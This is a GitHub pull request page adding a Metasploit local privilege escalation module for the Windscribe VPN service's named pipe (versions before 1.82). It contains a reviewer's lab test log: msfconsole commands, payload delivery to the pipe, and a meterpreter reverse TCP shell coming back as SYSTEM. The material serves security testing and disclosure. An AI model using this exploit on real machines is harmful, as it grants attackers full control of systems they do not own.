Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Windscribe WindscribeService Named Pipe Privilege Escalation #12894

Merged

Conversation

bcoles
Copy link
Contributor

@bcoles bcoles commented Feb 1, 2020

Add Windscribe WindscribeService Named Pipe Privilege Escalation

The Windscribe VPN client application for Windows makes use of a
Windows service WindscribeService.exe which exposes a named pipe
\\.\pipe\WindscribeService allowing execution of programs with
elevated privileges.

Windscribe versions prior to 1.82 do not validate user-supplied
program names, allowing execution of arbitrary commands as SYSTEM.

@bwatters-r7 bwatters-r7 self-assigned this Feb 5, 2020
@bwatters-r7
Copy link
Contributor

bwatters-r7 commented Feb 5, 2020

msf5 exploit(multi/handler) > use exploit/windows/local/windscribe_windscribeservice_priv_esc 
msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > show options

Module options (exploit/windows/local/windscribe_windscribeservice_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set session 1
session => 1
msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set lhost 192.168.135.168
lhost => 192.168.135.168
msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set verbose true
verbose => true
msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > run

[*] Started reverse TCP handler on 192.168.135.168:4444 
[*] Writing payload (283 bytes) to C:\Users\msfuser\AppData\Local\Temp\w40AUSFh.exe ...
[*] Sending C:\Users\msfuser\AppData\Local\Temp\w40AUSFh.exe to \\.\pipe\WindscribeService ...
[+] Opended \\.\pipe\WindscribeService! Proceeding ...
[*] Sending stage (180291 bytes) to 192.168.132.125
[*] Meterpreter session 2 opened (192.168.135.168:4444 -> 192.168.132.125:49682) at 2020-02-05 12:30:36 -0600
[-] Failed to delete C:\Users\msfuser\AppData\Local\Temp\w40AUSFh.exe: stdapi_fs_delete_file: Operation failed: Access is denied.

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

bwatters-r7 added a commit that referenced this pull request Feb 5, 2020
…calation

Merge branch 'land-12894' into upstream-master
@bwatters-r7 bwatters-r7 merged commit 34621c0 into rapid7:master Feb 5, 2020
3 checks passed
@bcoles bcoles deleted the windscribe_windscribeservice_priv_esc branch Feb 5, 2020
@bwatters-r7
Copy link
Contributor

bwatters-r7 commented Feb 5, 2020

Release Notes

This PR adds a local privilege escalation module for exploiting a vulnerability in the Windscribe service installed by Windscribe VPN versions < 1.82 that allows a user to run an arbitrary executable as SYSTEM.

@tperry-r7 tperry-r7 added the rn-modules release notes for new or majorly enhanced modules label Feb 20, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

3 participants